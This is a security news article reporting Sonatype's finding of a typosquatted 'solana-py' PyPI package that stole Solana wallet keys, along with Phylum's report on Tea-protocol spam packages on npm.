August 11, 2024Ravie LakshmananSupply Chain / Software Security

Cybersecurity researchers have discovered a new malicious package in the Python Package Index (PyPI) repository that masquerades as a library of the Solana blockchain platform, but is actually designed to steal secrets from victims.

“The legitimate Solana Python API project is known as ‘solana-py’ on GitHub, but simply ‘solana’ on the Python software registry, PyPI,” Sonatype researcher Axe Sharma said in a report published last week. “This small naming discrepancy was exploited by a threat actor who published a ‘solana-py’ project on PyPI.”

The malicious “solana-py” package has been downloaded a total of 1,122 times since its publication on August 4, 2024. It is no longer available for download via PyPI.

The most notable aspect of the library is that it carried the version numbers 0.34.3, 0.34.4, and 0.34.5. The latest version of the legitimate “solana” package is 0.34.3. This clearly points to an attempt by the threat actor to trick users searching for “solana” into inadvertently downloading “solana-py” instead.

Furthermore, the fraudulent package borrows the real code from its counterpart, but injects additional code into the “__init__.py” script responsible for collecting the keys of the Solana blockchain wallet from the system.

This information is then exfiltrated to a Hugging Face Spaces domain controlled by the malicious actor (“treeprime-gen.hf(.)space”), further highlighting how malicious actors are abusing legitimate services for malicious purposes.

The attack campaign poses a risk to the supply chain, as Sonatype’s research found that legitimate libraries such as “solders” reference “solana-py” in their PyPI documentation. This could lead to a scenario where developers accidentally downloaded “solana-py” from PyPI, thereby increasing the attack surface.

“In other words, if a developer uses the legitimate ‘solders’ PyPI package in his application and gets tricked (by solders’ documentation) into falling for the typosquatted ‘solana-py’ project, he inadvertently introduces a crypto-stealer into his application,” Sharma explains.

“By doing this, we not only steal their secrets, but also those of every user who uses the developer’s application.”

The revelation comes after Phylum claims to have identified hundreds of thousands of spam npm packages in its registry containing markers of Tea protocol abuse. This campaign first came to light in April 2024.

“The Tea Protocol project is taking steps to address this issue,” the supply chain security firm said. “It would be unfair for legitimate Tea Protocol participants to have their rewards reduced because others are scamming the system. Additionally, npm has begun removing some of these spammers, but the removal rate does not match the new publishing rate.”